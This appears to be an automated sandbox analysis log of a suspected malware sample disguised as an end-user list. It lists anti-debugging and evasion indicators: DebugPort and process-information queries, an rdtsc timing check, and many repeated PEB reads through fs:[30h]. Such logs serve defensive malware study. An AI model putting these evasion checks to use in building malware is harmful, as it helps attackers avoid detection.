                Source: secinit.exe, 00000007.00000002.2938814440.0000000003450000.00000004.00000020.00020000.00000000.sdmp, gJe493hPOgj2OnF5.exe, 00000008.00000002.2939478350.0000000001259000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000009.00000002.2376846343.000001F8C65FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012E096E rdtsc 2_2_012E096E
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_00417CF3 LdrLoadDll,2_2_00417CF3
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012D0124 mov eax, dword ptr fs:[00000030h]2_2_012D0124
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01360115 mov eax, dword ptr fs:[00000030h]2_2_01360115
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0134A118 mov ecx, dword ptr fs:[00000030h]2_2_0134A118
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0134A118 mov eax, dword ptr fs:[00000030h]2_2_0134A118
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0134A118 mov eax, dword ptr fs:[00000030h]2_2_0134A118
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0134A118 mov eax, dword ptr fs:[00000030h]2_2_0134A118
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0134E10E mov eax, dword ptr fs:[00000030h]2_2_0134E10E
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0134E10E mov ecx, dword ptr fs:[00000030h]2_2_0134E10E
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0134E10E mov eax, dword ptr fs:[00000030h]2_2_0134E10E
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0134E10E mov eax, dword ptr fs:[00000030h]2_2_0134E10E
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0134E10E mov ecx, dword ptr fs:[00000030h]2_2_0134E10E
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0134E10E mov eax, dword ptr fs:[00000030h]2_2_0134E10E
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0134E10E mov eax, dword ptr fs:[00000030h]2_2_0134E10E
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0134E10E mov ecx, dword ptr fs:[00000030h]2_2_0134E10E
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0134E10E mov eax, dword ptr fs:[00000030h]2_2_0134E10E
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0134E10E mov ecx, dword ptr fs:[00000030h]2_2_0134E10E
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01374164 mov eax, dword ptr fs:[00000030h]2_2_01374164
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01374164 mov eax, dword ptr fs:[00000030h]2_2_01374164
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01338158 mov eax, dword ptr fs:[00000030h]2_2_01338158
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01334144 mov eax, dword ptr fs:[00000030h]2_2_01334144
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01334144 mov eax, dword ptr fs:[00000030h]2_2_01334144
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01334144 mov ecx, dword ptr fs:[00000030h]2_2_01334144
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01334144 mov eax, dword ptr fs:[00000030h]2_2_01334144
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01334144 mov eax, dword ptr fs:[00000030h]2_2_01334144
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012A6154 mov eax, dword ptr fs:[00000030h]2_2_012A6154
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012A6154 mov eax, dword ptr fs:[00000030h]2_2_012A6154
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0129C156 mov eax, dword ptr fs:[00000030h]2_2_0129C156
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012E0185 mov eax, dword ptr fs:[00000030h]2_2_012E0185
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0132019F mov eax, dword ptr fs:[00000030h]2_2_0132019F
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0132019F mov eax, dword ptr fs:[00000030h]2_2_0132019F
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0132019F mov eax, dword ptr fs:[00000030h]2_2_0132019F
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0132019F mov eax, dword ptr fs:[00000030h]2_2_0132019F
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01344180 mov eax, dword ptr fs:[00000030h]2_2_01344180
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01344180 mov eax, dword ptr fs:[00000030h]2_2_01344180
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0135C188 mov eax, dword ptr fs:[00000030h]2_2_0135C188
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0135C188 mov eax, dword ptr fs:[00000030h]2_2_0135C188
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0129A197 mov eax, dword ptr fs:[00000030h]2_2_0129A197
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0129A197 mov eax, dword ptr fs:[00000030h]2_2_0129A197
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0129A197 mov eax, dword ptr fs:[00000030h]2_2_0129A197
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_013761E5 mov eax, dword ptr fs:[00000030h]2_2_013761E5
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012D01F8 mov eax, dword ptr fs:[00000030h]2_2_012D01F8
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0131E1D0 mov eax, dword ptr fs:[00000030h]2_2_0131E1D0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0131E1D0 mov eax, dword ptr fs:[00000030h]2_2_0131E1D0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0131E1D0 mov ecx, dword ptr fs:[00000030h]2_2_0131E1D0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0131E1D0 mov eax, dword ptr fs:[00000030h]2_2_0131E1D0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0131E1D0 mov eax, dword ptr fs:[00000030h]2_2_0131E1D0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_013661C3 mov eax, dword ptr fs:[00000030h]2_2_013661C3
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_013661C3 mov eax, dword ptr fs:[00000030h]2_2_013661C3
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01336030 mov eax, dword ptr fs:[00000030h]2_2_01336030
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0129A020 mov eax, dword ptr fs:[00000030h]2_2_0129A020
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0129C020 mov eax, dword ptr fs:[00000030h]2_2_0129C020
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01324000 mov ecx, dword ptr fs:[00000030h]2_2_01324000
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01342000 mov eax, dword ptr fs:[00000030h]2_2_01342000
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01342000 mov eax, dword ptr fs:[00000030h]2_2_01342000
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01342000 mov eax, dword ptr fs:[00000030h]2_2_01342000
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01342000 mov eax, dword ptr fs:[00000030h]2_2_01342000
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01342000 mov eax, dword ptr fs:[00000030h]2_2_01342000
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01342000 mov eax, dword ptr fs:[00000030h]2_2_01342000
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01342000 mov eax, dword ptr fs:[00000030h]2_2_01342000
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01342000 mov eax, dword ptr fs:[00000030h]2_2_01342000
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012BE016 mov eax, dword ptr fs:[00000030h]2_2_012BE016
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012BE016 mov eax, dword ptr fs:[00000030h]2_2_012BE016
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012BE016 mov eax, dword ptr fs:[00000030h]2_2_012BE016
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012BE016 mov eax, dword ptr fs:[00000030h]2_2_012BE016
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012CC073 mov eax, dword ptr fs:[00000030h]2_2_012CC073
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01326050 mov eax, dword ptr fs:[00000030h]2_2_01326050
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012A2050 mov eax, dword ptr fs:[00000030h]2_2_012A2050
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012980A0 mov eax, dword ptr fs:[00000030h]2_2_012980A0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_013660B8 mov eax, dword ptr fs:[00000030h]2_2_013660B8
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_013660B8 mov ecx, dword ptr fs:[00000030h]2_2_013660B8
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_013380A8 mov eax, dword ptr fs:[00000030h]2_2_013380A8
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012A208A mov eax, dword ptr fs:[00000030h]2_2_012A208A
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012A80E9 mov eax, dword ptr fs:[00000030h]2_2_012A80E9
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0129A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0129A0E3
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_013260E0 mov eax, dword ptr fs:[00000030h]2_2_013260E0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0129C0F0 mov eax, dword ptr fs:[00000030h]2_2_0129C0F0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012E20F0 mov ecx, dword ptr fs:[00000030h]2_2_012E20F0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_013220DE mov eax, dword ptr fs:[00000030h]2_2_013220DE
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01378324 mov eax, dword ptr fs:[00000030h]2_2_01378324
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01378324 mov ecx, dword ptr fs:[00000030h]2_2_01378324
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01378324 mov eax, dword ptr fs:[00000030h]2_2_01378324
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01378324 mov eax, dword ptr fs:[00000030h]2_2_01378324
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012DA30B mov eax, dword ptr fs:[00000030h]2_2_012DA30B
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012DA30B mov eax, dword ptr fs:[00000030h]2_2_012DA30B
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012DA30B mov eax, dword ptr fs:[00000030h]2_2_012DA30B
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0129C310 mov ecx, dword ptr fs:[00000030h]2_2_0129C310
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012C0310 mov ecx, dword ptr fs:[00000030h]2_2_012C0310
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0134437C mov eax, dword ptr fs:[00000030h]2_2_0134437C
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0136A352 mov eax, dword ptr fs:[00000030h]2_2_0136A352
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01348350 mov ecx, dword ptr fs:[00000030h]2_2_01348350
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0132035C mov eax, dword ptr fs:[00000030h]2_2_0132035C
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0132035C mov eax, dword ptr fs:[00000030h]2_2_0132035C
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0132035C mov eax, dword ptr fs:[00000030h]2_2_0132035C
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0132035C mov ecx, dword ptr fs:[00000030h]2_2_0132035C
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0132035C mov eax, dword ptr fs:[00000030h]2_2_0132035C
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0132035C mov eax, dword ptr fs:[00000030h]2_2_0132035C
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0137634F mov eax, dword ptr fs:[00000030h]2_2_0137634F
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01322349 mov eax, dword ptr fs:[00000030h]2_2_01322349
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01322349 mov eax, dword ptr fs:[00000030h]2_2_01322349
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01322349 mov eax, dword ptr fs:[00000030h]2_2_01322349
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01322349 mov eax, dword ptr fs:[00000030h]2_2_01322349
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01322349 mov eax, dword ptr fs:[00000030h]2_2_01322349
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01322349 mov eax, dword ptr fs:[00000030h]2_2_01322349
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01322349 mov eax, dword ptr fs:[00000030h]2_2_01322349
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01322349 mov eax, dword ptr fs:[00000030h]2_2_01322349
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01322349 mov eax, dword ptr fs:[00000030h]2_2_01322349
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01322349 mov eax, dword ptr fs:[00000030h]2_2_01322349
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01322349 mov eax, dword ptr fs:[00000030h]2_2_01322349
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01322349 mov eax, dword ptr fs:[00000030h]2_2_01322349
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01322349 mov eax, dword ptr fs:[00000030h]2_2_01322349
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01322349 mov eax, dword ptr fs:[00000030h]2_2_01322349
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01322349 mov eax, dword ptr fs:[00000030h]2_2_01322349
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0129E388 mov eax, dword ptr fs:[00000030h]2_2_0129E388
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0129E388 mov eax, dword ptr fs:[00000030h]2_2_0129E388
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0129E388 mov eax, dword ptr fs:[00000030h]2_2_0129E388
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012C438F mov eax, dword ptr fs:[00000030h]2_2_012C438F
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012C438F mov eax, dword ptr fs:[00000030h]2_2_012C438F
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01298397 mov eax, dword ptr fs:[00000030h]2_2_01298397
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01298397 mov eax, dword ptr fs:[00000030h]2_2_01298397
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01298397 mov eax, dword ptr fs:[00000030h]2_2_01298397
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B03E9 mov eax, dword ptr fs:[00000030h]2_2_012B03E9
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B03E9 mov eax, dword ptr fs:[00000030h]2_2_012B03E9
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B03E9 mov eax, dword ptr fs:[00000030h]2_2_012B03E9
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B03E9 mov eax, dword ptr fs:[00000030h]2_2_012B03E9
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B03E9 mov eax, dword ptr fs:[00000030h]2_2_012B03E9
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B03E9 mov eax, dword ptr fs:[00000030h]2_2_012B03E9
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B03E9 mov eax, dword ptr fs:[00000030h]2_2_012B03E9
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B03E9 mov eax, dword ptr fs:[00000030h]2_2_012B03E9
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012D63FF mov eax, dword ptr fs:[00000030h]2_2_012D63FF
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012BE3F0 mov eax, dword ptr fs:[00000030h]2_2_012BE3F0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012BE3F0 mov eax, dword ptr fs:[00000030h]2_2_012BE3F0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012BE3F0 mov eax, dword ptr fs:[00000030h]2_2_012BE3F0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_013443D4 mov eax, dword ptr fs:[00000030h]2_2_013443D4
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_013443D4 mov eax, dword ptr fs:[00000030h]2_2_013443D4
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012AA3C0 mov eax, dword ptr fs:[00000030h]2_2_012AA3C0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012AA3C0 mov eax, dword ptr fs:[00000030h]2_2_012AA3C0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012AA3C0 mov eax, dword ptr fs:[00000030h]2_2_012AA3C0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012AA3C0 mov eax, dword ptr fs:[00000030h]2_2_012AA3C0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012AA3C0 mov eax, dword ptr fs:[00000030h]2_2_012AA3C0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012AA3C0 mov eax, dword ptr fs:[00000030h]2_2_012AA3C0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012A83C0 mov eax, dword ptr fs:[00000030h]2_2_012A83C0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012A83C0 mov eax, dword ptr fs:[00000030h]2_2_012A83C0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012A83C0 mov eax, dword ptr fs:[00000030h]2_2_012A83C0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012A83C0 mov eax, dword ptr fs:[00000030h]2_2_012A83C0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0134E3DB mov eax, dword ptr fs:[00000030h]2_2_0134E3DB
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0134E3DB mov eax, dword ptr fs:[00000030h]2_2_0134E3DB
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0134E3DB mov ecx, dword ptr fs:[00000030h]2_2_0134E3DB
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0134E3DB mov eax, dword ptr fs:[00000030h]2_2_0134E3DB
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_013263C0 mov eax, dword ptr fs:[00000030h]2_2_013263C0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0135C3CD mov eax, dword ptr fs:[00000030h]2_2_0135C3CD
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0129823B mov eax, dword ptr fs:[00000030h]2_2_0129823B
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01350274 mov eax, dword ptr fs:[00000030h]2_2_01350274
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01350274 mov eax, dword ptr fs:[00000030h]2_2_01350274
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01350274 mov eax, dword ptr fs:[00000030h]2_2_01350274
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01350274 mov eax, dword ptr fs:[00000030h]2_2_01350274
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01350274 mov eax, dword ptr fs:[00000030h]2_2_01350274
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01350274 mov eax, dword ptr fs:[00000030h]2_2_01350274
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01350274 mov eax, dword ptr fs:[00000030h]2_2_01350274
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01350274 mov eax, dword ptr fs:[00000030h]2_2_01350274
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01350274 mov eax, dword ptr fs:[00000030h]2_2_01350274
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01350274 mov eax, dword ptr fs:[00000030h]2_2_01350274
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01350274 mov eax, dword ptr fs:[00000030h]2_2_01350274
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01350274 mov eax, dword ptr fs:[00000030h]2_2_01350274
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0129826B mov eax, dword ptr fs:[00000030h]2_2_0129826B
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012A4260 mov eax, dword ptr fs:[00000030h]2_2_012A4260
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012A4260 mov eax, dword ptr fs:[00000030h]2_2_012A4260
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012A4260 mov eax, dword ptr fs:[00000030h]2_2_012A4260
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0135A250 mov eax, dword ptr fs:[00000030h]2_2_0135A250
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0135A250 mov eax, dword ptr fs:[00000030h]2_2_0135A250
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0137625D mov eax, dword ptr fs:[00000030h]2_2_0137625D
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01328243 mov eax, dword ptr fs:[00000030h]2_2_01328243
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01328243 mov ecx, dword ptr fs:[00000030h]2_2_01328243
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012A6259 mov eax, dword ptr fs:[00000030h]2_2_012A6259
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0129A250 mov eax, dword ptr fs:[00000030h]2_2_0129A250
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B02A0 mov eax, dword ptr fs:[00000030h]2_2_012B02A0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B02A0 mov eax, dword ptr fs:[00000030h]2_2_012B02A0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_013362A0 mov eax, dword ptr fs:[00000030h]2_2_013362A0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_013362A0 mov ecx, dword ptr fs:[00000030h]2_2_013362A0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_013362A0 mov eax, dword ptr fs:[00000030h]2_2_013362A0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_013362A0 mov eax, dword ptr fs:[00000030h]2_2_013362A0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_013362A0 mov eax, dword ptr fs:[00000030h]2_2_013362A0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_013362A0 mov eax, dword ptr fs:[00000030h]2_2_013362A0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012DE284 mov eax, dword ptr fs:[00000030h]2_2_012DE284
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012DE284 mov eax, dword ptr fs:[00000030h]2_2_012DE284
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01320283 mov eax, dword ptr fs:[00000030h]2_2_01320283
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01320283 mov eax, dword ptr fs:[00000030h]2_2_01320283
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01320283 mov eax, dword ptr fs:[00000030h]2_2_01320283
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B02E1 mov eax, dword ptr fs:[00000030h]2_2_012B02E1
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B02E1 mov eax, dword ptr fs:[00000030h]2_2_012B02E1
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012B02E1 mov eax, dword ptr fs:[00000030h]2_2_012B02E1
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_013762D6 mov eax, dword ptr fs:[00000030h]2_2_013762D6
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012AA2C3 mov eax, dword ptr fs:[00000030h]2_2_012AA2C3
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012AA2C3 mov eax, dword ptr fs:[00000030h]2_2_012AA2C3
